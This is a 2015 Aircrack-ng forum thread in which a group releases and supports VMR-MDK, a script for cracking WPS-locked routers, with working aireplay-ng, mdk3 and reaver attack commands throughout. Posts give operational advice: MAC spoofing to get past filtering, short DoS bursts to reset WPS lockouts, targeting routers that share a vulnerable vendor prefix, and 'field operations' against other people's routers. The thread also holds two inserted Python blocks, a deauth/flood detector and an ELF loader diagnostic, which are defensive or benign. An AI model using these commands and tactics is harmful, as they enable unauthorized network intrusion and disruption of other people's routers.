Aircrack-ng forum

General Category => Useful stuff => Topic started by: musket33 on January 07, 2015, 12:11:56 pm

Title: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on January 07, 2015, 12:11:56 pm
VMR-MDK-K2-011x8.sh for Kali2.0

Musket Teams have voted to release the following WPS Locked Intrusion Script for General Use:

Included in the VMR-MDK package

1. mdk3-v6 folder
2. configfiledetailed for reference only
3. Help Files
4. PDDSA-K2-06.sh
5. VMR-MDK-K2-2016R-011x9.sh

For Kali 1.10a

Loaded 8 March 2016
Download VMR-MDK011x8 package at:

http://www.datafilehost.com/d/4f95b97f

For kali 2.0 and 2016.1R

You can download VMR-MDK-K2-2016R-011x9.zip package at

Loaded 8 March 2016
http://www.datafilehost.com/d/c2a2b474


MTeams
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: misterx on January 08, 2015, 03:40:59 am
The file does not exist.
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: Unknown on January 08, 2015, 08:32:37 am
The file does not exist.

I saved it yesterday, but be careful, I didn't have the time to check it:

http://www.file-upload.net/download-10111196/VMRMDK-150107.zip.html
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on January 08, 2015, 08:33:43 am
We have found an error in one(1) configuration file named:

     configfiledetailed1x2

You can REM/COMMENT out with a # the following two(2) variables:

USE_PIN1=  should read #USE_PIN1=
WPS_PIN1=  should read #WPS_PIN1=


or you can download the corrected version


New Download

http://www.datafilehost.com/d/18156813

Musket Teams
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: misterx on January 09, 2015, 04:31:35 am
You should upload it here, that would be easier.
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: madafakaz on January 09, 2015, 10:19:19 pm
Any ideas how to properly authenticate with routers that throw an "Association denied (code 18)" error? reaver does nothing, and aireplay gives code 18 if I try to use it as external authentication.

Someone mentioned the same issue but there was no progress/solution posted so far. http://code.google.com/p/reaver-wps/issues/detail?id=377
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on January 10, 2015, 06:25:10 pm
Sorry Mr X, we simply did not know a download facility was available.

We have included the attachment here.

MTeams
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on January 12, 2015, 02:55:57 pm
To madafakaz

Mteams have used the following three aireplay-ng and mdk3 commands to try and activate the router to respond to reaver:

aireplay-ng -0 10 -a XX:XX:XX:XX:XX:XX mon0

aireplay-ng -1 20 -a XX:XX:XX:XX:XX:XX -q 10 mon0

mdk3 mon0 f  -t XX:XX:XX:XX:XX:XX -f 99:99:99

We also suggest you use the following long reaver command line, suggested by the author of auto-reaver:

reaver  -i mon0 -a -f -c 1 -b XX:XX:XX:XX:XX:XX -r 3:10 -E -S -vv -N -T 1 -t 20 -d 0 -x 30

If you spoof your MAC in reaver, change it from the command line first and only then add --mac=XX:XX:XX:XX:XX:XX to the reaver command line, otherwise reaver will fail. Make sure the MAC you spoof is the same as the MAC in your command line.

MTeams
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on February 05, 2015, 01:45:51 am
Reaver tools - aireplay-ng fakeauth and mdk3 MAC Filter brute force restart.

The following bash script has been re-released for public use. This simple program is designed to be used with reaver to activate router response to a reaver request for pins.
The script assumes a reaver attack is in progress and the user has already placed the wifi device in monitor mode through airmon-ng.


Musket Teams
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: pedropt on February 07, 2015, 09:13:28 pm
Your script is interesting; I will give you an idea to apply in the next version:

- Some APs have MAC address filtering. To bypass this you can put airodump listening to that particular AP and look for connected clients, then pick the MAC address of that specific connected client and change the mon0 MAC address to that client's MAC address.

As soon as I remember more I will write them down here.

Note: try to change the script's configuration so the varmac_config folder is in the script folder; it is annoying to have the script in:
/root/tools/wifi/vmrmdk

and the varmac_config folder in:
/root/varmac_config/
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: Atmadja on February 23, 2015, 07:14:09 am
Hi, thanks for your work, it seems to work for me!! :)
I'm at 8% now, hope it will find the right pin within a month ^^
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on February 24, 2015, 12:32:18 pm
To Atmadja

Note the following:

You have found a WPS Locked router that is susceptible to this approach.

Note the first six hex digits of the router's BSSID; there is a good chance other routers with this hex sequence are also vulnerable. This has been the case in areas we do field operations in.

Do not be surprised if the pin completion jumps suddenly to 91%.

Read our steps should your pins spin endlessly at 99.99%.

It may take a few weeks, so give it time to work.

MTeams

Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on February 24, 2015, 02:32:48 pm
To pedropt

As we note in the help files, you can run the script from root or place it in the user/bin folder and run it from the command line. We only support kali-linux distros.

As to MAC spoofing: we have never seen a single case where reaver was blocked by MAC filtering. That being said, we cannot prove that a router's lack of response was due to MAC filtering by the router. We have tested this by spoofing the MAC of associated clients, but this did not change the router's lack of response to reaver. For this reason we did not include the ability to select a specific MAC address.

MTeams would be interested in any view you have on this subject.
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: pedropt on February 25, 2015, 06:46:39 pm
About the MAC spoof, it has already happened to me 3 times. The situation is that some people configure their APs to be accessed only by their own configured MAC addresses (TVs, phones, laptops), and no matter what you try to do with aireplay, it will not get an authentication, due to the fact that every MAC address generated does not match the configured ones on the router.
For those cases I have to wait and see which MAC addresses do the handshake and stay connected, and then I have to change mon0 to one of those MAC addresses so I can be authenticated with the router.
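From the other side of the air interface, the three things exchanged in this thread so far (the aireplay-ng deauth and fake-authentication commands and the mdk3 flood in musket33's January 12 post, and the cloned client MAC pedropt describes here) all leave a signature in a monitor-mode capture. The following is an added example, not code from VMR-MDK or any tool named in the thread, that parses raw 802.11 management frames and flags each pattern offline; the BSSID, client address, thresholds and the sample capture it builds are all constructed for the example.

```python
"""Offline detector for the 802.11 management-frame patterns discussed in this thread.

Added example, not code from VMR-MDK or any tool named here. Input: a list of
(timestamp_seconds, raw_frame_bytes) from a monitor-mode capture. Reports deauth
bursts (aireplay-ng -0 style), authentication floods to one BSSID (aireplay-ng -1
/ mdk3 a style) and one client address used by two radios at once (the MAC
cloning pedropt describes). Addresses and thresholds are constructed.
"""
import struct
from collections import defaultdict

SUBTYPE_PROBE_REQ = 0x4  # management subtypes (IEEE 802.11 type 0)
SUBTYPE_AUTH = 0xB
SUBTYPE_DEAUTH = 0xC
DEAUTH_PER_SEC = 20      # normal operation rarely produces more than a few deauths per minute
AUTH_PER_SEC = 10        # a real station authenticates once, not ten times a second
CLONE_BACKSTEPS = 5      # backward sequence-number jumps before an address counts as cloned


def mac_str(b):
    return ':'.join('%02x' % x for x in b)


def parse_mgmt_frame(raw):
    """Decode the 24-byte 802.11 header: (subtype, addr1, addr2, addr3, seq) or None.

    Frame Control byte 0 carries the type in bits 2-3 and the subtype in bits 4-7;
    Sequence Control at offset 22 is little endian, sequence number in the high 12 bits.
    """
    if len(raw) < 24 or (raw[0] >> 2) & 0x3 != 0:   # truncated, or type != 0 (management)
        return None
    seq_ctrl = struct.unpack_from('<H', raw, 22)[0]
    return ((raw[0] >> 4) & 0xF, mac_str(raw[4:10]), mac_str(raw[10:16]),
            mac_str(raw[16:22]), seq_ctrl >> 4)


def build_mgmt_frame(subtype, addr1, addr2, addr3, seq):
    """Assemble a minimal management frame in memory (used only to construct sample input)."""
    addrs = b''.join(bytes(int(x, 16) for x in a.split(':')) for a in (addr1, addr2, addr3))
    return bytes([subtype << 4, 0]) + b'\x00\x00' + addrs + struct.pack('<H', seq << 4)


def analyse(frames):
    """Return a list of (kind, address, detail) alerts for a capture."""
    deauth = defaultdict(int)      # (second, transmitter) -> deauth count
    auth = defaultdict(set)        # (second, bssid) -> transmitters seen
    auth_count = defaultdict(int)  # (second, bssid) -> auth frame count
    last_seq = {}                  # transmitter -> last sequence number seen
    backsteps = defaultdict(int)   # transmitter -> backward sequence jumps
    for ts, raw in frames:
        parsed = parse_mgmt_frame(raw)
        if parsed is None:
            continue
        subtype, _, a2, a3, seq = parsed
        sec = int(ts)
        if subtype == SUBTYPE_DEAUTH:
            deauth[(sec, a2)] += 1
        elif subtype == SUBTYPE_AUTH:
            auth[(sec, a3)].add(a2)
            auth_count[(sec, a3)] += 1
        # One radio counts upward mod 4096; two radios sharing an address
        # interleave their counters and produce repeated backward jumps.
        prev = last_seq.get(a2)
        if prev is not None and seq < prev and prev - seq < 2048:
            backsteps[a2] += 1
        last_seq[a2] = seq
    alerts = []
    for (sec, tx), n in sorted(deauth.items()):
        if n >= DEAUTH_PER_SEC:
            alerts.append(('deauth_burst', tx, '%d deauth frames at t=%d' % (n, sec)))
    for (sec, bssid), n in sorted(auth_count.items()):
        if n >= AUTH_PER_SEC:
            srcs = len(auth[(sec, bssid)])
            alerts.append(('auth_flood', bssid, '%d auth frames from %d sources at t=%d' % (n, srcs, sec)))
    for tx, n in sorted(backsteps.items()):
        if n >= CLONE_BACKSTEPS:
            alerts.append(('mac_clone', tx, '%d backward sequence jumps' % n))
    return alerts


AP = '00:11:22:33:44:55'      # constructed BSSID
CLIENT = 'aa:bb:cc:dd:ee:01'  # constructed legitimate client
BCAST = 'ff:ff:ff:ff:ff:ff'


def sample_capture():
    """Constructed capture holding one instance of each pattern."""
    frames = []
    for i in range(30):   # t=0.0-0.9: broadcast deauths claiming to come from the AP
        frames.append((i * 0.03, build_mgmt_frame(SUBTYPE_DEAUTH, BCAST, AP, AP, 100 + i)))
    for i in range(40):   # t=1.0-1.8: auth frames to the AP from 40 made-up source addresses
        src = '02:00:00:00:00:%02x' % i
        frames.append((1.0 + i * 0.02, build_mgmt_frame(SUBTYPE_AUTH, AP, src, AP, i)))
    for i in range(12):   # t=2.0-4.3: the genuine client and a clone of it, interleaved
        frames.append((2.0 + i * 0.2, build_mgmt_frame(SUBTYPE_PROBE_REQ, BCAST, CLIENT, BCAST, 500 + i)))
        frames.append((2.1 + i * 0.2, build_mgmt_frame(SUBTYPE_PROBE_REQ, BCAST, CLIENT, BCAST, 1500 + i)))
    return frames


if __name__ == '__main__':
    for kind, addr, detail in analyse(sample_capture()):
        print('%-13s %s  %s' % (kind, addr, detail))
```

A legitimate station wrapping its counter from 4095 to 0 is not counted as a backward jump, so a single radio never trips the clone check.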
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: Atmadja on February 27, 2015, 11:29:23 am
I had a problem yesterday: the script was working normally and suddenly something happened and Kali wrote a 100G file "xsession-error", so the partition was full.
After deleting this file, I restarted your script but reaver started from 0%.
Thanks to the logs, I knew that the attack stopped at pin 1190XXXX.
So I entered "1190" in the first line of /etc/reaver/"bssid".wpc.
After restarting the script, reaver continues testing from 10% but it tests pins like this:
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Entering recurring delay of 15 seconds
[+] Trying pin 1375
8
[+] Sending EAPOL START request

Do you have an idea why it tests a 4-digit pin only, and what is this "8"?

Thank you for your help and nice job again :)
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: Atmadja on March 02, 2015, 10:35:28 am
I've resolved the problem by deleting the wpc file and creating a new one with "1190" on the first line.
I think the problem was that the wpc file was corrupted during the memory problem.

Hope it will help someone in my case  :)
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on March 06, 2015, 01:14:13 pm
Sorry for not answering, but we only just saw your comments. In truth we would have been of little help, as we have never seen this problem before. We found your rewrite of the wpc file interesting.

MTeams
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on March 06, 2015, 01:27:15 pm
To Pedropt,

Regarding setting a specific MAC address: as you have noted that this problem can exist, we are looking into adding this ability to the script. We will advise here when completed.
 
MTeams
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on April 04, 2015, 01:07:46 pm
As working pixie-dust programs are becoming available, MTeams suggest referencing the pixie dust threads in the kali-linux forums. As VMR-MDK009x2 can force some routers to respond to reaver, running a pixie-dust attack in the background could obtain the WPS pin in less than three minutes. This pin could then be loaded into the VMR-MDK009x2 script, thus reducing cracking time considerably.

 
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: pedropt on April 04, 2015, 02:28:23 pm
Your script is good in attack mode. One AP I was trying to crack manually, but I couldn't because that specific AP needed to be restarted. I used your script; I could not get the WPS, but your script was able to freeze the AP. I know that because I did not see the AP online after 1 hour of banging it with mdk.
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on April 07, 2015, 10:38:11 am
To pedropt

VMR-MDK009x2 is designed to be used against routers that show a locked state but give up some pins and then, when hit with mdk3, allow another round of pin harvesting.

We are currently rewriting to allow the assignment of a specific MAC address and to include pixiedust in the routines.

You might also look at ReVdK3r2.sh. See the kali-linux forums for the download. There may be a later version. As we are not the authors we are unsure of the latest version.

MTeams
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on April 29, 2015, 02:15:28 am
Musket Teams have voted to release their Pixie Dust Data Sequence Analyzer PDDSA-01.sh for general use. This script was originally written to work with VMR-MDK009x2.sh, a WPS locked intrusion script, but it can work with any text file output from modded reaver programs showing both PKE and PKR.

PDDSA-01.sh simply reads any data output in text format from a modded reaver program, looks for valid Pixie Dust sequences and extracts the pin using pixiewps. No cut and paste. You can check all the sequences in the file or just one. After the first valid sequence is found the program can cycle through all the other sequences as required.

If you are not using VMR-MDK009x2 then simply use the command line:

    reaver -i mon0 -a -f -c 1 -b 55:44:33:22:11:00 -vv | tee /root/VARMAC_LOGS/targetAP

The reaver command line side can be altered as required; however the -vv must remain or data will not be written.

There is a help file in the download.

PDDSA-01.sh and PDDSA-02.sh are withdrawn

PDDSA-05.sh which supports brute forcing a wps pin when using pixiewps1.1 by wiire is available at
http://www.datafilehost.com/d/8986ce13


MTEAMS
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on April 29, 2015, 11:59:28 pm
To pedropt

MTeams has been sidetracked with Pixie Dust; however we are again turning our attention to the MAC address matter you have raised, and are looking for some input from you.

When VMR-MDK009x2.sh runs it sets up three(3) monitors, mon0, mon1 and mon2, for use by mdk3. Would you prefer:

Currently all three(3) are assigned random MAC addresses.

We can allow other choices:

1. mon0 has the ability to have a MAC address assigned while mon1 and mon2 are random
2. mon0, mon1 and mon2 are assigned a single MAC address by the user
3. mon0, mon1 and mon2 are assigned individual MAC addresses by the user.

Keep in mind that mon1 and mon2 are only used by mdk3 during the DEAUTH process, while mon0 is used by wash, reaver and mdk3.

MTeams

Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on May 10, 2015, 09:53:20 am
Musket Teams have released their lab version of Pixie Dust Data Sequence Analyzer PDDSA-06.sh for general use. This script requires the installation of pixiedust1.1 by wiire and has been updated to allow for the more advanced features of version 1.1 such as brute forcing the WPS Pin.

The script supports the latest pixiedust modded reaver program from t6_x, datahead and soxrok2212 as of 11 May 15. Older modded reaver programs are not supported. See the kali-linux forums for the latest.


You can download at

http://www.datafilehost.com/d/a30c5b3d

or the attachment below.

MTeams
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on May 13, 2015, 12:24:28 am
To Pedropt:

We have duplicated your findings with respect to MAC address spoofing and the collection of WPS Pins with reaver. Well done and thank you!!!

For WPS Locked routers that are susceptible to VMR-MDK009x2.sh, pin harvesting immediately commenced when we spoofed the MAC address of a connected client.

We will send you a beta version called VMR-MDK009x5.sh if you wish. Write us through kali-linux. See mmusket33.

However, if you have updated to the newer airmon-ng, do not bother. Due to limits imposed by the newer version the program will not function. It may be a while before we load the newer version of aircrack-ng onto another computer and find a way around the newer version of airmon-ng's limitations.

MTeams
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: silense on June 15, 2015, 01:12:17 am
try -p 1357@@@@
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on August 01, 2015, 03:42:50 am
To pedropt

    Our latest VMR-MDK script has been released. Included are your suggestions concerning MAC addresses. See beginning of this thread for download address and thanks again for your input.

MTeams
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: Matt on August 24, 2015, 09:15:43 am
I followed the instructions in the help files, but make doesn't seem to build anything; it says the program doesn't exist. Am I doing something wrong here?
Quote
root@acorn:~# cd /root/mdk3-v6/
root@acorn:~/mdk3-v6# make
make -C osdep
make[1]: Entering directory '/root/mdk3-v6/osdep'
Building for Linux
make[2]: Entering directory '/root/mdk3-v6/osdep'
make[2]: '.os.Linux' is up to date.
make[2]: Leaving directory '/root/mdk3-v6/osdep'
make[1]: Leaving directory '/root/mdk3-v6/osdep'
root@acorn:~/mdk3-v6# make install
make -C osdep install
make[1]: Entering directory '/root/mdk3-v6/osdep'
Building for Linux
make[2]: Entering directory '/root/mdk3-v6/osdep'
make[2]: '.os.Linux' is up to date.
make[2]: Leaving directory '/root/mdk3-v6/osdep'
make[1]: Leaving directory '/root/mdk3-v6/osdep'
install -D -m 0755 mdk3 //usr/local/sbin/mdk3
root@acorn:~/mdk3-v6# chmod 755 /root/mdk3-v6/*
root@acorn:~/mdk3-v6# /root/mdk3-v6/mdk3
bash: /root/mdk3-v6/mdk3: No such file or directory
root@acorn:~/mdk3-v6# mdk3
bash: /usr/local/sbin/mdk3: No such file or directory

And yes, there is a file within /usr/local/sbin/mdk3 as well.
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: misterx on August 24, 2015, 06:08:07 pm
Have you tried just typing mdk3 as root (and not the full path)?
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: SilentMatt on August 24, 2015, 10:27:20 pm
Have you tried just typing mdk3 as root (and not the full path)?
Yes, I've tried every which way to launch it. I've tried to do this via kali 1.1.0a and 2.0.   Kali 1.1.0a was a fresh install too.

Quote
root@acorn:~# mdk3
bash: /usr/local/sbin/mdk3: No such file or directory
root@acorn:~# cd /usr/local/sbin/
root@acorn:/usr/local/sbin# ls -la
total 376
drwxrwsr-x  2 root staff   4096 Aug 24 05:08 .
drwxrwsr-x 10 root staff   4096 Aug 12 01:18 ..
-rwxr-xr-x  1 root staff 374518 Aug 24 05:08 mdk3
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on August 28, 2015, 12:32:51 pm
To Silent Matt

You can only use this version of VMR-MDK with versions up to kali 1.10a. Kali 2.0 does not support Eterm and some folders have been changed, among other things.

We have a VMR-MDK Kali2.0 version under test at this time. MTeams will probably release it within a month. We will post the release download here and at the kali linux forums. This version is plug and play, as all the dependencies are loaded, including the newer mdk3 attack.

Now with respect to mdk3 that supports Invalid ESSID: Kali 1.10a already has an mdk3 program installed. Follow the instructions in the help file and you will install another version to root.

The help files show you how to test the install. If you pick Invalid ESSID as an attack in the config file then VMR-MDK accesses this folder in root.

You can run VMR-MDK without this feature working.

MTeams
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on September 08, 2015, 11:46:18 pm
A kali-linux 2.0 version has been released. See top of this thread for download addresses for both kali2.0 and kali 1.10a or lower.

Musket Teams(STO)
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: rostar99 on September 13, 2015, 07:51:42 pm
To silent matt (and anyone else having the "No such file or directory" error when trying to run mdk3)
If you are running Kali amd64 you might be missing the necessary x86 libraries to support x86 processes.
See http://askubuntu.com/questions/133389/no-such-file-or-directory-but-the-file-exists

Particularly the "64 bit Ubuntu Multiarch systems" answer. This is what I did to fix the issue.
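The diagnosis above is the usual cause of this puzzling error: the shell is reporting that the program interpreter recorded inside the binary (for a 32-bit build on an amd64 host, the i386 loader /lib/ld-linux.so.2) is absent, not that mdk3 itself is. The following added example, not from the thread or the VMR-MDK package, reads the ELF header and PT_INTERP segment of a file and names the missing loader; the minimal ELF32 image it constructs is sample input for the check, not a runnable program.

```python
"""Why an ELF binary that is plainly on disk can still fail with "No such file or directory".

Added example, not from the thread or any tool in it. The message comes from
execve(): the kernel found the file but not the program interpreter named inside
it (for a 32-bit build on amd64 that is /lib/ld-linux.so.2, shipped by the i386
multiarch libc). Reading the ELF header and PT_INTERP segment names the missing
path explicitly instead of leaving it to be guessed.
"""
import os
import struct
import sys

ELF_MAGIC = b'\x7fELF'
PT_INTERP = 3


def elf_interpreter(data):
    """Return (bitness, interpreter_path) for an ELF image; the path is None if static."""
    if data[:4] != ELF_MAGIC:
        raise ValueError('not an ELF file')
    end = '<' if data[5] == 1 else '>'   # EI_DATA: 1 = little endian, 2 = big endian
    if data[4] == 1:                      # EI_CLASS 1 = ELF32
        bits = 32
        phoff = struct.unpack_from(end + 'I', data, 0x1C)[0]
        phentsize, phnum = struct.unpack_from(end + 'HH', data, 0x2A)
    elif data[4] == 2:                    # EI_CLASS 2 = ELF64
        bits = 64
        phoff = struct.unpack_from(end + 'Q', data, 0x20)[0]
        phentsize, phnum = struct.unpack_from(end + 'HH', data, 0x36)
    else:
        raise ValueError('unknown ELF class %d' % data[4])
    for i in range(phnum):
        off = phoff + i * phentsize
        if struct.unpack_from(end + 'I', data, off)[0] != PT_INTERP:
            continue
        if bits == 32:   # Elf32_Phdr: p_type, p_offset, p_vaddr, p_paddr, p_filesz, ...
            p_offset, _, _, p_filesz = struct.unpack_from(end + 'IIII', data, off + 4)
        else:            # Elf64_Phdr: p_type, p_flags, p_offset, p_vaddr, p_paddr, p_filesz, ...
            p_offset, _, _, p_filesz = struct.unpack_from(end + 'QQQQ', data, off + 8)
        return bits, data[p_offset:p_offset + p_filesz].rstrip(b'\x00').decode()
    return bits, None


def diagnose(data, exists=os.path.exists):
    """Explain the execve() outcome for an ELF image (exists() is injectable for tests)."""
    bits, interp = elf_interpreter(data)
    if interp is None:
        return 'ELF%d, statically linked: the loader is not the problem' % bits
    if exists(interp):
        return 'ELF%d, interpreter %s present' % (bits, interp)
    hint = ' (32-bit binary on a 64-bit host: install the i386 multiarch libc)' if bits == 32 else ''
    return 'ELF%d, interpreter %s missing%s' % (bits, interp, hint)


def make_elf32(interp):
    """Construct a minimal little-endian i386 ELF32 image whose only segment is PT_INTERP.

    Sample input for the check above; it is not a runnable program.
    """
    path = interp.encode() + b'\x00'
    ehsize, phentsize = 52, 32
    ident = ELF_MAGIC + bytes([1, 1, 1, 0]) + b'\x00' * 8       # ELF32, LE, version 1, SYSV ABI
    header = ident + struct.pack('<HHIIIIIHHHHHH', 2, 3, 1, 0,  # ET_EXEC, EM_386, version, entry
                                 ehsize, 0, 0, ehsize, phentsize, 1, 0, 0, 0)
    phdr = struct.pack('<IIIIIIII', PT_INTERP, ehsize + phentsize, 0, 0, len(path), len(path), 4, 1)
    return header + phdr + path


if __name__ == '__main__':
    target = sys.argv[1] if len(sys.argv) > 1 else None
    data = open(target, 'rb').read() if target else make_elf32('/lib/ld-linux.so.2')
    print(diagnose(data))
```

Run it with the path of the installed binary as its argument; with no argument it diagnoses the constructed sample image.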
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: mrmasonman on September 15, 2015, 12:31:58 am
Hi musket33,

I installed your vmr-mdk-kali2 in my root folder. It starts up and goes through the whole process, but when it starts reading the APs it reads ok, but there's another window saying "found packets with bad fcs, skipping", so even if I press yes to see my list there is no window that shows up with my list of APs. I have kali 2 in live mode; I don't have it installed because of the login probs. Thanks for any advice guys. :)
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on September 16, 2015, 05:35:22 am
You should not run this program in Live mode. These attacks can take a long time, sometimes weeks. You need to store the data you have collected. Making a persistent USB is really easy. Go to the how-to section in kali. MTeams has three tutorials. We even show you how to enable persistence when only Windows is available.

Now to your problem:
Each xterm window has a heading. From the data you said was in the window, you are looking at the wash scan. You are probably using a wifi device that does not support packet injection.

MTeams
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: rho on October 30, 2015, 09:49:24 pm
Hey MTeam,
Thank you for all the awesome work.
I got the mdk3-v6 script, got everything to run on kali2.0 with the new airmon-ng,
so I'm unable to set virtual monitor modes due to the limitations.. And I understand, due to the new airmon-ng.

- However, on running mdk3, now I'm getting an error on both my wifi chipsets, pci-e Atheros 9285X as well as usb Atheros 9271:
Quote
Ndiswrapper doesnt support monitor mode.
..
edit: However, on extensively searching, I figured I should not be getting this error, as I'm using ath9k drivers, and BT/Kali disregarded ndiswrapper ages ago, as they never supported monitor mode, never will..

Next question:
I'm trying to reset/mdk my cisco linksys e900 router v1 FW 1.00.00.01, which locks up for 60 seconds after every 5 successful incorrect pins, then for 15 seconds for the next incorrect pin, and this cycle continues.. (Yes I know it's weird, but it's happening)
So how do I use the mdk3 script to run along with reaver?
I'm eager to try this, but presently mdk3 is completely broken..

- Also, is it possible for the PKR value(s) of the same router to change?
My e900 happened to have a PKR value the first time I used reaver against it.. It was something else the next time, and now it's 00:00:00:00:00......:00:00:00:02 (yes, all zeroes and a two).
I noticed this as I tried inputting the values manually in PixyWps.

Kind Regards

===========

EDIT: disregard the above error.. restarted machine. Works fine. Now testing modes.

===========

Edit 2: Tried this on a d-link router, rtl 8xxx chipset [2.4 + 5ghz mimo], wps locked:
mdk3 wlan0mon a -n xx:xx:xx:xx:xx:xx (in one term initially, then 2 terms, then 3 terms) for an hr

2-3 times 19.5k clients connected - NO effect
The term window did mention "AP seems to have frozen", "AP back up again"..
But on checking via another machine (airodump and browsing in general).. no effect

Same for linksys e2500 and linksys e900 - no effect
(have physical access to all 3 APs, all wps locked)

Also, the TKIP -m mode has no effect whatsoever.

Point me in the right direction if I'm doing something wrong

thx

Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on November 01, 2015, 02:15:49 am
To rho

We answered you in kali-forums. However, with your new questions:

1. The VMR-MDK approach only works with some routers. As mentioned in the help files, for VMR-MDK to work you should see the following response from the router:

1. Collect some pins, then the router locks its WPS system.

2. With the router's WPS system locked, hit it with VMR-MDK DDOS (try type 3, 4 or 14) for about 15 to 20 seconds only, then rest for about 120 seconds and then try collecting WPS pins again. If you collect more pins after a short mdk3/DDOS burst then you will eventually crack the router.

If you apply too much mdk3 then the router might crash and you will have to wait.

In some cases routers are not affected by DDOS processes. VMR-MDK then will not work.

The tkiptun-ng approach is experimental. We added it after it broke a router that never ever responded to any reaver attack for over a year. But after leaving tkiptun-ng running through VMR-MDK for over 12 hours overnight, we found in the morning the WPA key was broken through only one cycle of reaver during one of the cyclic VMR-MDK attacks during the 12 hr period. As noted, in some cases if the router gets hit with small amounts of MDK3 repeatedly it may reset its WPS pin to 12345670. This is why we added the retest 12345670 feature to the VMR-MDK menu, as we have seen this occur repeatedly.

In closing, we have never found that a complete resetting of routers ever worked in our areas of operation. And we again refer you to the extensive help files. VMR-MDK is not a magic bullet, just one tool in the WPA cracking process.
MTeams
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on November 01, 2015, 02:26:50 am
To rho

We answered you in kali-forums. However, with your new questions:

1. The VMR-MDK approach only works with some routers. As mentioned in the help files, for VMR-MDK to work you should see the following response from the router:

1. Collect some pins, then the router locks its WPS system.

2. With the router's WPS system locked, hit it with VMR-MDK DDOS (try type 3, 4 or 14) for about 15 to 20 seconds only, then rest for about 120 seconds and then try collecting WPS pins again. If you collect more pins after a short mdk3/DDOS burst then you will eventually crack the router.

If you apply too much mdk3 then the router might crash and you will have to wait.

In some cases routers are not affected by DDOS processes. VMR-MDK then will not work.

The tkiptun-ng approach is experimental. We added it after it broke a router that never ever responded to any reaver attack for over a year. But after leaving tkiptun-ng running through VMR-MDK for over 12 hours overnight, we found in the morning the WPA key was broken through only one cycle of reaver during one of the VMR-MDK attacks sometime during the 12 hr period. If VMR-MDK cracks the WPA key then the program stops with the key on the screen. As noted, in some cases if the router gets hit with small amounts of MDK3 repeatedly, it may reset its WPS pin to 12345670. This is why we added the retest 12345670 feature to the VMR-MDK menu, as we have seen this occur repeatedly.

In closing, we have never found that a complete resetting of routers ever worked in our areas of operation. And we again refer you to the extensive help files. VMR-MDK is not a magic bullet, just one(1) tool in the WPA cracking process.
MTeams
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: tdv281 on November 21, 2015, 05:53:44 pm
To musket33
I did the same as in your instruction file, but after terminating the first cycle the program stops and shows the message in the attached file. Please help me on this. I'm using kali 2.0 with the installed programs: reaver t6x, pixie dust 1.1, mdk3 and aircrack-ng. All of that has been updated to the latest version. Thanks and hope you could help me.
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on November 22, 2015, 11:23:29 am
To tdv281

We tried to duplicate your problem and could not.

You are getting an airmon-ng warning when entering data incorrectly. Make sure you remove any monitors like wlan0mon etc. manually before running. We have had reports that if you enter the device wlan0 or mon0 rather than the line number this can occur, but when we try this the program just stops.

You might reboot the computer, plug in the wifi device and run the program.

We have not tested this program using vmware.
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: brunoaduarte on November 25, 2015, 04:16:11 am
Hi musket33,

